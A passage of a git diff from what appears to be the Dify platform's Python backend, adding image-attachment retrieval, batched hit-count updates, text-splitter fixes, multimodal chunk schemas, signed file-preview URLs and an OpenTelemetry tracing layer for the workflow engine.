:param app_id: app_id @@ -118,7 +125,7 @@ class DatasetRetrieval: """ dataset_ids = config.dataset_ids if len(dataset_ids) == 0: - return None + return None, [] retrieve_config = config.retrieve_config # check model is support tool calling @@ -136,7 +143,7 @@ class DatasetRetrieval: ) if not model_schema: - return None + return None, [] planning_strategy = PlanningStrategy.REACT_ROUTER features = model_schema.features @@ -182,8 +189,8 @@ class DatasetRetrieval: tenant_id, user_id, user_from, - available_datasets, query, + available_datasets, model_instance, model_config, planning_strategy, @@ -213,6 +220,7 @@ class DatasetRetrieval: dify_documents = [item for item in all_documents if item.provider == "dify"] external_documents = [item for item in all_documents if item.provider == "external"] document_context_list: list[DocumentContext] = [] + context_files: list[File] = [] retrieval_resource_list: list[RetrievalSourceMetadata] = [] # deal with external documents for item in external_documents: @@ -248,6 +256,31 @@ class DatasetRetrieval: score=record.score, ) ) + if vision_enabled: + attachments_with_bindings = db.session.execute( + select(SegmentAttachmentBinding, UploadFile) + .join(UploadFile, UploadFile.id == SegmentAttachmentBinding.attachment_id) + .where( + SegmentAttachmentBinding.segment_id == segment.id, + ) + ).all() + if attachments_with_bindings: + for _, upload_file in attachments_with_bindings: + attachment_info = File( + id=upload_file.id, + filename=upload_file.name, + extension="." + upload_file.extension, + mime_type=upload_file.mime_type, + tenant_id=segment.tenant_id, + type=FileType.IMAGE, + transfer_method=FileTransferMethod.LOCAL_FILE, + remote_url=upload_file.source_url, + related_id=upload_file.id, + size=upload_file.size, + storage_key=upload_file.key, + url=sign_upload_file(upload_file.id, upload_file.extension), + ) + context_files.append(attachment_info) if show_retrieve_source: for record in records: segment = record.segment @@ -288,8 +321,10 @@ class DatasetRetrieval: hit_callback.return_retriever_resource_info(retrieval_resource_list) if document_context_list: document_context_list = sorted(document_context_list, key=lambda x: x.score or 0.0, reverse=True) - return str("\n".join([document_context.content for document_context in document_context_list])) - return "" + return str( + "\n".join([document_context.content for document_context in document_context_list]) + ), context_files + return "", context_files def single_retrieve( self, @@ -297,8 +332,8 @@ class DatasetRetrieval: tenant_id: str, user_id: str, user_from: str, - available_datasets: list, query: str, + available_datasets: list, model_instance: ModelInstance, model_config: ModelConfigWithCredentialsEntity, planning_strategy: PlanningStrategy, @@ -336,7 +371,7 @@ class DatasetRetrieval: dataset_id, router_usage = function_call_router.invoke(query, tools, model_config, model_instance) self._record_usage(router_usage) - + timer = None if dataset_id: # get retrieval model config dataset_stmt = select(Dataset).where(Dataset.id == dataset_id) @@ -406,10 +441,19 @@ class DatasetRetrieval: weights=retrieval_model_config.get("weights", None), document_ids_filter=document_ids_filter, ) - self._on_query(query, [dataset_id], app_id, user_from, user_id) + self._on_query(query, None, [dataset_id], app_id, user_from, user_id) if results: - self._on_retrieval_end(results, message_id, timer) + thread = threading.Thread( + target=self._on_retrieval_end, + kwargs={ + "flask_app": current_app._get_current_object(), # 
type: ignore + "documents": results, + "message_id": message_id, + "timer": timer, + }, + ) + thread.start() return results return [] @@ -421,7 +465,7 @@ class DatasetRetrieval: user_id: str, user_from: str, available_datasets: list, - query: str, + query: str | None, top_k: int, score_threshold: float, reranking_mode: str, @@ -431,10 +475,11 @@ class DatasetRetrieval: message_id: str | None = None, metadata_filter_document_ids: dict[str, list[str]] | None = None, metadata_condition: MetadataCondition | None = None, + attachment_ids: list[str] | None = None, ): if not available_datasets: return [] - threads = [] + all_threads = [] all_documents: list[Document] = [] dataset_ids = [dataset.id for dataset in available_datasets] index_type_check = all( @@ -467,102 +512,187 @@ class DatasetRetrieval: 0 ].embedding_model_provider weights["vector_setting"]["embedding_model_name"] = available_datasets[0].embedding_model - - for dataset in available_datasets: - index_type = dataset.indexing_technique - document_ids_filter = None - if dataset.provider != "external": - if metadata_condition and not metadata_filter_document_ids: - continue - if metadata_filter_document_ids: - document_ids = metadata_filter_document_ids.get(dataset.id, []) - if document_ids: - document_ids_filter = document_ids - else: - continue - retrieval_thread = threading.Thread( - target=self._retriever, - kwargs={ - "flask_app": current_app._get_current_object(), # type: ignore - "dataset_id": dataset.id, - "query": query, - "top_k": top_k, - "all_documents": all_documents, - "document_ids_filter": document_ids_filter, - "metadata_condition": metadata_condition, - }, - ) - threads.append(retrieval_thread) - retrieval_thread.start() - for thread in threads: - thread.join() - with measure_time() as timer: - if reranking_enable: - # do rerank for searched documents - data_post_processor = DataPostProcessor(tenant_id, reranking_mode, reranking_model, weights, False) - - all_documents = data_post_processor.invoke( - query=query, documents=all_documents, score_threshold=score_threshold, top_n=top_k + if query: + query_thread = threading.Thread( + target=self._multiple_retrieve_thread, + kwargs={ + "flask_app": current_app._get_current_object(), # type: ignore + "available_datasets": available_datasets, + "metadata_condition": metadata_condition, + "metadata_filter_document_ids": metadata_filter_document_ids, + "all_documents": all_documents, + "tenant_id": tenant_id, + "reranking_enable": reranking_enable, + "reranking_mode": reranking_mode, + "reranking_model": reranking_model, + "weights": weights, + "top_k": top_k, + "score_threshold": score_threshold, + "query": query, + "attachment_id": None, + }, ) - else: - if index_type == "economy": - all_documents = self.calculate_keyword_score(query, all_documents, top_k) - elif index_type == "high_quality": - all_documents = self.calculate_vector_score(all_documents, top_k, score_threshold) - else: - all_documents = all_documents[:top_k] if top_k else all_documents - - self._on_query(query, dataset_ids, app_id, user_from, user_id) + all_threads.append(query_thread) + query_thread.start() + if attachment_ids: + for attachment_id in attachment_ids: + attachment_thread = threading.Thread( + target=self._multiple_retrieve_thread, + kwargs={ + "flask_app": current_app._get_current_object(), # type: ignore + "available_datasets": available_datasets, + "metadata_condition": metadata_condition, + "metadata_filter_document_ids": metadata_filter_document_ids, + "all_documents": all_documents, + 
"tenant_id": tenant_id, + "reranking_enable": reranking_enable, + "reranking_mode": reranking_mode, + "reranking_model": reranking_model, + "weights": weights, + "top_k": top_k, + "score_threshold": score_threshold, + "query": None, + "attachment_id": attachment_id, + }, + ) + all_threads.append(attachment_thread) + attachment_thread.start() + for thread in all_threads: + thread.join() + self._on_query(query, attachment_ids, dataset_ids, app_id, user_from, user_id) if all_documents: - self._on_retrieval_end(all_documents, message_id, timer) + # add thread to call _on_retrieval_end + retrieval_end_thread = threading.Thread( + target=self._on_retrieval_end, + kwargs={ + "flask_app": current_app._get_current_object(), # type: ignore + "documents": all_documents, + "message_id": message_id, + "timer": timer, + }, + ) + retrieval_end_thread.start() + retrieval_resource_list = [] + doc_ids_filter = [] + for document in all_documents: + if document.provider == "dify": + doc_id = document.metadata.get("doc_id") + if doc_id and doc_id not in doc_ids_filter: + doc_ids_filter.append(doc_id) + retrieval_resource_list.append(document) + elif document.provider == "external": + retrieval_resource_list.append(document) + return retrieval_resource_list - return all_documents - - def _on_retrieval_end(self, documents: list[Document], message_id: str | None = None, timer: dict | None = None): + def _on_retrieval_end( + self, flask_app: Flask, documents: list[Document], message_id: str | None = None, timer: dict | None = None + ): """Handle retrieval end.""" - dify_documents = [document for document in documents if document.provider == "dify"] - for document in dify_documents: - if document.metadata is not None: - dataset_document_stmt = select(DatasetDocument).where( - DatasetDocument.id == document.metadata["document_id"] - ) - dataset_document = db.session.scalar(dataset_document_stmt) - if dataset_document: - if dataset_document.doc_form == IndexType.PARENT_CHILD_INDEX: - child_chunk_stmt = select(ChildChunk).where( - ChildChunk.index_node_id == document.metadata["doc_id"], - ChildChunk.dataset_id == dataset_document.dataset_id, - ChildChunk.document_id == dataset_document.id, - ) - child_chunk = db.session.scalar(child_chunk_stmt) - if child_chunk: - _ = ( - db.session.query(DocumentSegment) - .where(DocumentSegment.id == child_chunk.segment_id) - .update( - {DocumentSegment.hit_count: DocumentSegment.hit_count + 1}, - synchronize_session=False, - ) - ) + with flask_app.app_context(): + dify_documents = [document for document in documents if document.provider == "dify"] + if not dify_documents: + self._send_trace_task(message_id, documents, timer) + return + + with Session(db.engine) as session: + # Collect all document_ids and batch fetch DatasetDocuments + document_ids = { + doc.metadata["document_id"] + for doc in dify_documents + if doc.metadata and "document_id" in doc.metadata + } + if not document_ids: + self._send_trace_task(message_id, documents, timer) + return + + dataset_docs_stmt = select(DatasetDocument).where(DatasetDocument.id.in_(document_ids)) + dataset_docs = session.scalars(dataset_docs_stmt).all() + dataset_doc_map = {str(doc.id): doc for doc in dataset_docs} + + # Categorize documents by type and collect necessary IDs + parent_child_text_docs: list[tuple[Document, DatasetDocument]] = [] + parent_child_image_docs: list[tuple[Document, DatasetDocument]] = [] + normal_text_docs: list[tuple[Document, DatasetDocument]] = [] + normal_image_docs: list[tuple[Document, DatasetDocument]] = [] 
+ + for doc in dify_documents: + if not doc.metadata or "document_id" not in doc.metadata: + continue + dataset_doc = dataset_doc_map.get(doc.metadata["document_id"]) + if not dataset_doc: + continue + + is_image = doc.metadata.get("doc_type") == DocType.IMAGE + is_parent_child = dataset_doc.doc_form == IndexStructureType.PARENT_CHILD_INDEX + + if is_parent_child: + if is_image: + parent_child_image_docs.append((doc, dataset_doc)) + else: + parent_child_text_docs.append((doc, dataset_doc)) else: - query = db.session.query(DocumentSegment).where( - DocumentSegment.index_node_id == document.metadata["doc_id"] + if is_image: + normal_image_docs.append((doc, dataset_doc)) + else: + normal_text_docs.append((doc, dataset_doc)) + + segment_ids_to_update: set[str] = set() + + # Process PARENT_CHILD_INDEX text documents - batch fetch ChildChunks + if parent_child_text_docs: + index_node_ids = [doc.metadata["doc_id"] for doc, _ in parent_child_text_docs if doc.metadata] + if index_node_ids: + child_chunks_stmt = select(ChildChunk).where(ChildChunk.index_node_id.in_(index_node_ids)) + child_chunks = session.scalars(child_chunks_stmt).all() + child_chunk_map = {chunk.index_node_id: chunk.segment_id for chunk in child_chunks} + for doc, _ in parent_child_text_docs: + if doc.metadata: + segment_id = child_chunk_map.get(doc.metadata["doc_id"]) + if segment_id: + segment_ids_to_update.add(str(segment_id)) + + # Process non-PARENT_CHILD_INDEX text documents - batch fetch DocumentSegments + if normal_text_docs: + index_node_ids = [doc.metadata["doc_id"] for doc, _ in normal_text_docs if doc.metadata] + if index_node_ids: + segments_stmt = select(DocumentSegment).where(DocumentSegment.index_node_id.in_(index_node_ids)) + segments = session.scalars(segments_stmt).all() + segment_map = {seg.index_node_id: seg.id for seg in segments} + for doc, _ in normal_text_docs: + if doc.metadata: + segment_id = segment_map.get(doc.metadata["doc_id"]) + if segment_id: + segment_ids_to_update.add(str(segment_id)) + + # Process IMAGE documents - batch fetch SegmentAttachmentBindings + all_image_docs = parent_child_image_docs + normal_image_docs + if all_image_docs: + attachment_ids = [ + doc.metadata["doc_id"] + for doc, _ in all_image_docs + if doc.metadata and doc.metadata.get("doc_id") + ] + if attachment_ids: + bindings_stmt = select(SegmentAttachmentBinding).where( + SegmentAttachmentBinding.attachment_id.in_(attachment_ids) ) + bindings = session.scalars(bindings_stmt).all() + segment_ids_to_update.update(str(binding.segment_id) for binding in bindings) - # if 'dataset_id' in document.metadata: - if "dataset_id" in document.metadata: - query = query.where(DocumentSegment.dataset_id == document.metadata["dataset_id"]) + # Batch update hit_count for all segments + if segment_ids_to_update: + session.query(DocumentSegment).where(DocumentSegment.id.in_(segment_ids_to_update)).update( + {DocumentSegment.hit_count: DocumentSegment.hit_count + 1}, + synchronize_session=False, + ) + session.commit() - # add hit count to document segment - query.update( - {DocumentSegment.hit_count: DocumentSegment.hit_count + 1}, synchronize_session=False - ) + self._send_trace_task(message_id, documents, timer) - db.session.commit() - - # get tracing instance + def _send_trace_task(self, message_id: str | None, documents: list[Document], timer: dict | None): + """Send trace task if trace manager is available.""" trace_manager: TraceQueueManager | None = ( self.application_generate_entity.trace_manager if self.application_generate_entity else 
None ) @@ -573,25 +703,40 @@ class DatasetRetrieval: ) ) - def _on_query(self, query: str, dataset_ids: list[str], app_id: str, user_from: str, user_id: str): + def _on_query( + self, + query: str | None, + attachment_ids: list[str] | None, + dataset_ids: list[str], + app_id: str, + user_from: str, + user_id: str, + ): """ Handle query. """ - if not query: + if not query and not attachment_ids: return dataset_queries = [] for dataset_id in dataset_ids: - dataset_query = DatasetQuery( - dataset_id=dataset_id, - content=query, - source="app", - source_app_id=app_id, - created_by_role=user_from, - created_by=user_id, - ) - dataset_queries.append(dataset_query) - if dataset_queries: - db.session.add_all(dataset_queries) + contents = [] + if query: + contents.append({"content_type": QueryType.TEXT_QUERY, "content": query}) + if attachment_ids: + for attachment_id in attachment_ids: + contents.append({"content_type": QueryType.IMAGE_QUERY, "content": attachment_id}) + if contents: + dataset_query = DatasetQuery( + dataset_id=dataset_id, + content=json.dumps(contents), + source="app", + source_app_id=app_id, + created_by_role=user_from, + created_by=user_id, + ) + dataset_queries.append(dataset_query) + if dataset_queries: + db.session.add_all(dataset_queries) db.session.commit() def _retriever( @@ -603,6 +748,7 @@ class DatasetRetrieval: all_documents: list, document_ids_filter: list[str] | None = None, metadata_condition: MetadataCondition | None = None, + attachment_ids: list[str] | None = None, ): with flask_app.app_context(): dataset_stmt = select(Dataset).where(Dataset.id == dataset_id) @@ -611,7 +757,7 @@ class DatasetRetrieval: if not dataset: return [] - if dataset.provider == "external": + if dataset.provider == "external" and query: external_documents = ExternalDatasetService.fetch_external_knowledge_retrieval( tenant_id=dataset.tenant_id, dataset_id=dataset_id, @@ -663,6 +809,7 @@ class DatasetRetrieval: reranking_mode=retrieval_model.get("reranking_mode") or "reranking_model", weights=retrieval_model.get("weights", None), document_ids_filter=document_ids_filter, + attachment_ids=attachment_ids, ) all_documents.extend(documents) @@ -1222,3 +1369,86 @@ class DatasetRetrieval: usage = LLMUsage.empty_usage() return full_text, usage + + def _multiple_retrieve_thread( + self, + flask_app: Flask, + available_datasets: list, + metadata_condition: MetadataCondition | None, + metadata_filter_document_ids: dict[str, list[str]] | None, + all_documents: list[Document], + tenant_id: str, + reranking_enable: bool, + reranking_mode: str, + reranking_model: dict | None, + weights: dict[str, Any] | None, + top_k: int, + score_threshold: float, + query: str | None, + attachment_id: str | None, + ): + with flask_app.app_context(): + threads = [] + all_documents_item: list[Document] = [] + index_type = None + for dataset in available_datasets: + index_type = dataset.indexing_technique + document_ids_filter = None + if dataset.provider != "external": + if metadata_condition and not metadata_filter_document_ids: + continue + if metadata_filter_document_ids: + document_ids = metadata_filter_document_ids.get(dataset.id, []) + if document_ids: + document_ids_filter = document_ids + else: + continue + retrieval_thread = threading.Thread( + target=self._retriever, + kwargs={ + "flask_app": flask_app, + "dataset_id": dataset.id, + "query": query, + "top_k": top_k, + "all_documents": all_documents_item, + "document_ids_filter": document_ids_filter, + "metadata_condition": metadata_condition, + "attachment_ids": 
[attachment_id] if attachment_id else None, + }, + ) + threads.append(retrieval_thread) + retrieval_thread.start() + for thread in threads: + thread.join() + + if reranking_enable: + # do rerank for searched documents + data_post_processor = DataPostProcessor(tenant_id, reranking_mode, reranking_model, weights, False) + if query: + all_documents_item = data_post_processor.invoke( + query=query, + documents=all_documents_item, + score_threshold=score_threshold, + top_n=top_k, + query_type=QueryType.TEXT_QUERY, + ) + if attachment_id: + all_documents_item = data_post_processor.invoke( + documents=all_documents_item, + score_threshold=score_threshold, + top_n=top_k, + query_type=QueryType.IMAGE_QUERY, + query=attachment_id, + ) + else: + if index_type == IndexTechniqueType.ECONOMY: + if not query: + all_documents_item = [] + else: + all_documents_item = self.calculate_keyword_score(query, all_documents_item, top_k) + elif index_type == IndexTechniqueType.HIGH_QUALITY: + all_documents_item = self.calculate_vector_score(all_documents_item, top_k, score_threshold) + else: + all_documents_item = all_documents_item[:top_k] if top_k else all_documents_item + if all_documents_item: + all_documents.extend(all_documents_item) diff --git a/api/core/rag/splitter/fixed_text_splitter.py b/api/core/rag/splitter/fixed_text_splitter.py index 801d2a2a52..b65cb14d8e 100644 --- a/api/core/rag/splitter/fixed_text_splitter.py +++ b/api/core/rag/splitter/fixed_text_splitter.py @@ -2,6 +2,7 @@ from __future__ import annotations +import codecs import re from typing import Any @@ -52,7 +53,7 @@ class FixedRecursiveCharacterTextSplitter(EnhanceRecursiveCharacterTextSplitter) def __init__(self, fixed_separator: str = "\n\n", separators: list[str] | None = None, **kwargs: Any): """Create a new TextSplitter.""" super().__init__(**kwargs) - self._fixed_separator = fixed_separator + self._fixed_separator = codecs.decode(fixed_separator, "unicode_escape") self._separators = separators or ["\n\n", "\n", "。", ". 
", " ", ""] def split_text(self, text: str) -> list[str]: @@ -94,7 +95,8 @@ class FixedRecursiveCharacterTextSplitter(EnhanceRecursiveCharacterTextSplitter) splits = re.split(r" +", text) else: splits = text.split(separator) - splits = [item + separator if i < len(splits) else item for i, item in enumerate(splits)] + if self._keep_separator: + splits = [s + separator for s in splits[:-1]] + splits[-1:] else: splits = list(text) if separator == "\n": @@ -103,7 +105,7 @@ class FixedRecursiveCharacterTextSplitter(EnhanceRecursiveCharacterTextSplitter) splits = [s for s in splits if (s not in {"", "\n"})] _good_splits = [] _good_splits_lengths = [] # cache the lengths of the splits - _separator = separator if self._keep_separator else "" + _separator = "" if self._keep_separator else separator s_lens = self._length_function(splits) if separator != "": for s, s_len in zip(splits, s_lens): diff --git a/api/core/schemas/builtin/schemas/v1/multimodal_general_structure.json b/api/core/schemas/builtin/schemas/v1/multimodal_general_structure.json new file mode 100644 index 0000000000..1a07869662 --- /dev/null +++ b/api/core/schemas/builtin/schemas/v1/multimodal_general_structure.json @@ -0,0 +1,65 @@ +{ + "$id": "https://dify.ai/schemas/v1/multimodal_general_structure.json", + "$schema": "http://json-schema.org/draft-07/schema#", + "version": "1.0.0", + "type": "array", + "title": "Multimodal General Structure", + "description": "Schema for multimodal general structure (v1) - array of objects", + "properties": { + "general_chunks": { + "type": "array", + "items": { + "type": "object", + "properties": { + "content": { + "type": "string", + "description": "The content" + }, + "files": { + "type": "array", + "items": { + "type": "object", + "properties": { + "name": { + "type": "string", + "description": "file name" + }, + "size": { + "type": "number", + "description": "file size" + }, + "extension": { + "type": "string", + "description": "file extension" + }, + "type": { + "type": "string", + "description": "file type" + }, + "mime_type": { + "type": "string", + "description": "file mime type" + }, + "transfer_method": { + "type": "string", + "description": "file transfer method" + }, + "url": { + "type": "string", + "description": "file url" + }, + "related_id": { + "type": "string", + "description": "file related id" + } + }, + "description": "List of files" + } + } + }, + "required": ["content"] + }, + "description": "List of content and files" + } + } +} \ No newline at end of file diff --git a/api/core/schemas/builtin/schemas/v1/multimodal_parent_child_structure.json b/api/core/schemas/builtin/schemas/v1/multimodal_parent_child_structure.json new file mode 100644 index 0000000000..4ffb590519 --- /dev/null +++ b/api/core/schemas/builtin/schemas/v1/multimodal_parent_child_structure.json @@ -0,0 +1,78 @@ +{ + "$id": "https://dify.ai/schemas/v1/multimodal_parent_child_structure.json", + "$schema": "http://json-schema.org/draft-07/schema#", + "version": "1.0.0", + "type": "object", + "title": "Multimodal Parent-Child Structure", + "description": "Schema for multimodal parent-child structure (v1)", + "properties": { + "parent_mode": { + "type": "string", + "description": "The mode of parent-child relationship" + }, + "parent_child_chunks": { + "type": "array", + "items": { + "type": "object", + "properties": { + "parent_content": { + "type": "string", + "description": "The parent content" + }, + "files": { + "type": "array", + "items": { + "type": "object", + "properties": { + "name": { + "type": 
"string", + "description": "file name" + }, + "size": { + "type": "number", + "description": "file size" + }, + "extension": { + "type": "string", + "description": "file extension" + }, + "type": { + "type": "string", + "description": "file type" + }, + "mime_type": { + "type": "string", + "description": "file mime type" + }, + "transfer_method": { + "type": "string", + "description": "file transfer method" + }, + "url": { + "type": "string", + "description": "file url" + }, + "related_id": { + "type": "string", + "description": "file related id" + } + }, + "required": ["name", "size", "extension", "type", "mime_type", "transfer_method", "url", "related_id"] + }, + "description": "List of files" + }, + "child_contents": { + "type": "array", + "items": { + "type": "string" + }, + "description": "List of child contents" + } + }, + "required": ["parent_content", "child_contents"] + }, + "description": "List of parent-child chunk pairs" + } + }, + "required": ["parent_mode", "parent_child_chunks"] +} \ No newline at end of file diff --git a/api/core/tools/errors.py b/api/core/tools/errors.py index b0c2232857..e4afe24426 100644 --- a/api/core/tools/errors.py +++ b/api/core/tools/errors.py @@ -29,6 +29,10 @@ class ToolApiSchemaError(ValueError): pass +class ToolSSRFError(ValueError): + pass + + class ToolCredentialPolicyViolationError(ValueError): pass diff --git a/api/core/tools/signature.py b/api/core/tools/signature.py index 5cdf473542..fef3157f27 100644 --- a/api/core/tools/signature.py +++ b/api/core/tools/signature.py @@ -25,6 +25,24 @@ def sign_tool_file(tool_file_id: str, extension: str) -> str: return f"{file_preview_url}?timestamp={timestamp}&nonce={nonce}&sign={encoded_sign}" +def sign_upload_file(upload_file_id: str, extension: str) -> str: + """ + sign file to get a temporary url for plugin access + """ + # Use internal URL for plugin/tool file access in Docker environments + base_url = dify_config.INTERNAL_FILES_URL or dify_config.FILES_URL + file_preview_url = f"{base_url}/files/{upload_file_id}/image-preview" + + timestamp = str(int(time.time())) + nonce = os.urandom(16).hex() + data_to_sign = f"image-preview|{upload_file_id}|{timestamp}|{nonce}" + secret_key = dify_config.SECRET_KEY.encode() if dify_config.SECRET_KEY else b"" + sign = hmac.new(secret_key, data_to_sign.encode(), hashlib.sha256).digest() + encoded_sign = base64.urlsafe_b64encode(sign).decode() + + return f"{file_preview_url}?timestamp={timestamp}&nonce={nonce}&sign={encoded_sign}" + + def verify_tool_file_signature(file_id: str, timestamp: str, nonce: str, sign: str) -> bool: """ verify signature diff --git a/api/core/tools/utils/message_transformer.py b/api/core/tools/utils/message_transformer.py index ca2aa39861..df322eda1c 100644 --- a/api/core/tools/utils/message_transformer.py +++ b/api/core/tools/utils/message_transformer.py @@ -101,6 +101,8 @@ class ToolFileMessageTransformer: meta = message.meta or {} mimetype = meta.get("mime_type", "application/octet-stream") + if not mimetype: + mimetype = "application/octet-stream" # get filename from meta filename = meta.get("filename", None) # if message is str, encode it to bytes diff --git a/api/core/tools/utils/parser.py b/api/core/tools/utils/parser.py index 6eabde3991..3486182192 100644 --- a/api/core/tools/utils/parser.py +++ b/api/core/tools/utils/parser.py @@ -425,7 +425,7 @@ class ApiBasedToolSchemaParser: except ToolApiSchemaError as e: openapi_error = e - # openai parse error, fallback to swagger + # openapi parse error, fallback to swagger try: 
converted_swagger = ApiBasedToolSchemaParser.parse_swagger_to_openapi( loaded_content, extra_info=extra_info, warning=warning @@ -436,7 +436,6 @@ class ApiBasedToolSchemaParser: ), schema_type except ToolApiSchemaError as e: swagger_error = e - # swagger parse error, fallback to openai plugin try: openapi_plugin = ApiBasedToolSchemaParser.parse_openai_plugin_json_to_tool_bundle( diff --git a/api/core/tools/utils/text_processing_utils.py b/api/core/tools/utils/text_processing_utils.py index 105823f896..0f9a91a111 100644 --- a/api/core/tools/utils/text_processing_utils.py +++ b/api/core/tools/utils/text_processing_utils.py @@ -13,5 +13,5 @@ def remove_leading_symbols(text: str) -> str: """ # Match Unicode ranges for punctuation and symbols # FIXME this pattern is confused quick fix for #11868 maybe refactor it later - pattern = r"^[\u2000-\u206F\u2E00-\u2E7F\u3000-\u303F!\"#$%&'()*+,./:;<=>?@^_`~]+" + pattern = r'^[\[\]\u2000-\u2025\u2027-\u206F\u2E00-\u2E7F\u3000-\u300F\u3011-\u303F"#$%&\'()*+,./:;<=>?@^_`~]+' return re.sub(pattern, "", text) diff --git a/api/core/tools/workflow_as_tool/provider.py b/api/core/tools/workflow_as_tool/provider.py index 4852e9d2d8..0439fb1d60 100644 --- a/api/core/tools/workflow_as_tool/provider.py +++ b/api/core/tools/workflow_as_tool/provider.py @@ -221,7 +221,7 @@ class WorkflowToolProviderController(ToolProviderController): session.query(WorkflowToolProvider) .where( WorkflowToolProvider.tenant_id == tenant_id, - WorkflowToolProvider.app_id == self.provider_id, + WorkflowToolProvider.id == self.provider_id, ) .first() ) diff --git a/api/core/workflow/graph_engine/graph_engine.py b/api/core/workflow/graph_engine/graph_engine.py index a4b2df2a8c..2e8b8f345f 100644 --- a/api/core/workflow/graph_engine/graph_engine.py +++ b/api/core/workflow/graph_engine/graph_engine.py @@ -140,6 +140,10 @@ class GraphEngine: pause_handler = PauseCommandHandler() self._command_processor.register_handler(PauseCommand, pause_handler) + # === Extensibility === + # Layers allow plugins to extend engine functionality + self._layers: list[GraphEngineLayer] = [] + # === Worker Pool Setup === # Capture Flask app context for worker threads flask_app: Flask | None = None @@ -158,6 +162,7 @@ class GraphEngine: ready_queue=self._ready_queue, event_queue=self._event_queue, graph=self._graph, + layers=self._layers, flask_app=flask_app, context_vars=context_vars, min_workers=self._min_workers, @@ -196,10 +201,6 @@ class GraphEngine: event_emitter=self._event_manager, ) - # === Extensibility === - # Layers allow plugins to extend engine functionality - self._layers: list[GraphEngineLayer] = [] - # === Validation === # Ensure all nodes share the same GraphRuntimeState instance self._validate_graph_state_consistency() diff --git a/api/core/workflow/graph_engine/layers/__init__.py b/api/core/workflow/graph_engine/layers/__init__.py index 0a29a52993..772433e48c 100644 --- a/api/core/workflow/graph_engine/layers/__init__.py +++ b/api/core/workflow/graph_engine/layers/__init__.py @@ -8,9 +8,11 @@ with middleware-like components that can observe events and interact with execut from .base import GraphEngineLayer from .debug_logging import DebugLoggingLayer from .execution_limits import ExecutionLimitsLayer +from .observability import ObservabilityLayer __all__ = [ "DebugLoggingLayer", "ExecutionLimitsLayer", "GraphEngineLayer", + "ObservabilityLayer", ] diff --git a/api/core/workflow/graph_engine/layers/base.py b/api/core/workflow/graph_engine/layers/base.py index 24c12c2934..780f92a0f4 100644 --- 
a/api/core/workflow/graph_engine/layers/base.py +++ b/api/core/workflow/graph_engine/layers/base.py @@ -9,6 +9,7 @@ from abc import ABC, abstractmethod from core.workflow.graph_engine.protocols.command_channel import CommandChannel from core.workflow.graph_events import GraphEngineEvent +from core.workflow.nodes.base.node import Node from core.workflow.runtime import ReadOnlyGraphRuntimeState @@ -83,3 +84,29 @@ class GraphEngineLayer(ABC): error: The exception that caused execution to fail, or None if successful """ pass + + def on_node_run_start(self, node: Node) -> None: # noqa: B027 + """ + Called immediately before a node begins execution. + + Layers can override to inject behavior (e.g., start spans) prior to node execution. + The node's execution ID is available via `node.execution_id` and will be + consistent with all events emitted by this node execution. + + Args: + node: The node instance about to be executed + """ + pass + + def on_node_run_end(self, node: Node, error: Exception | None) -> None: # noqa: B027 + """ + Called after a node finishes execution. + + The node's execution ID is available via `node.execution_id` and matches + the `id` field in all events emitted by this node execution. + + Args: + node: The node instance that just finished execution + error: Exception instance if the node failed, otherwise None + """ + pass diff --git a/api/core/workflow/graph_engine/layers/node_parsers.py b/api/core/workflow/graph_engine/layers/node_parsers.py new file mode 100644 index 0000000000..b6bac794df --- /dev/null +++ b/api/core/workflow/graph_engine/layers/node_parsers.py @@ -0,0 +1,61 @@ +""" +Node-level OpenTelemetry parser interfaces and defaults. +""" + +import json +from typing import Protocol + +from opentelemetry.trace import Span +from opentelemetry.trace.status import Status, StatusCode + +from core.workflow.nodes.base.node import Node +from core.workflow.nodes.tool.entities import ToolNodeData + + +class NodeOTelParser(Protocol): + """Parser interface for node-specific OpenTelemetry enrichment.""" + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: ...
+ + +class DefaultNodeOTelParser: + """Fallback parser used when no node-specific parser is registered.""" + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: + span.set_attribute("node.id", node.id) + if node.execution_id: + span.set_attribute("node.execution_id", node.execution_id) + if hasattr(node, "node_type") and node.node_type: + span.set_attribute("node.type", node.node_type.value) + + if error: + span.record_exception(error) + span.set_status(Status(StatusCode.ERROR, str(error))) + else: + span.set_status(Status(StatusCode.OK)) + + +class ToolNodeOTelParser: + """Parser for tool nodes that captures tool-specific metadata.""" + + def __init__(self) -> None: + self._delegate = DefaultNodeOTelParser() + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: + self._delegate.parse(node=node, span=span, error=error) + + tool_data = getattr(node, "_node_data", None) + if not isinstance(tool_data, ToolNodeData): + return + + span.set_attribute("tool.provider.id", tool_data.provider_id) + span.set_attribute("tool.provider.type", tool_data.provider_type.value) + span.set_attribute("tool.provider.name", tool_data.provider_name) + span.set_attribute("tool.name", tool_data.tool_name) + span.set_attribute("tool.label", tool_data.tool_label) + if tool_data.plugin_unique_identifier: + span.set_attribute("tool.plugin.id", tool_data.plugin_unique_identifier) + if tool_data.credential_id: + span.set_attribute("tool.credential.id", tool_data.credential_id) + if tool_data.tool_configurations: + span.set_attribute("tool.config", json.dumps(tool_data.tool_configurations, ensure_ascii=False)) diff --git a/api/core/workflow/graph_engine/layers/observability.py b/api/core/workflow/graph_engine/layers/observability.py new file mode 100644 index 0000000000..a674816884 --- /dev/null +++ b/api/core/workflow/graph_engine/layers/observability.py @@ -0,0 +1,169 @@ +""" +Observability layer for GraphEngine. + +This layer creates OpenTelemetry spans for node execution, enabling distributed +tracing of workflow execution. It establishes OTel context during node execution +so that automatic instrumentation (HTTP requests, DB queries, etc.) automatically +associates with the node span. +""" + +import logging +from dataclasses import dataclass +from typing import cast, final + +from opentelemetry import context as context_api +from opentelemetry.trace import Span, SpanKind, Tracer, get_tracer, set_span_in_context +from typing_extensions import override + +from configs import dify_config +from core.workflow.enums import NodeType +from core.workflow.graph_engine.layers.base import GraphEngineLayer +from core.workflow.graph_engine.layers.node_parsers import ( + DefaultNodeOTelParser, + NodeOTelParser, + ToolNodeOTelParser, +) +from core.workflow.nodes.base.node import Node +from extensions.otel.runtime import is_instrument_flag_enabled + +logger = logging.getLogger(__name__) + + +@dataclass(slots=True) +class _NodeSpanContext: + span: "Span" + token: object + + +@final +class ObservabilityLayer(GraphEngineLayer): + """ + Layer that creates OpenTelemetry spans for node execution. 
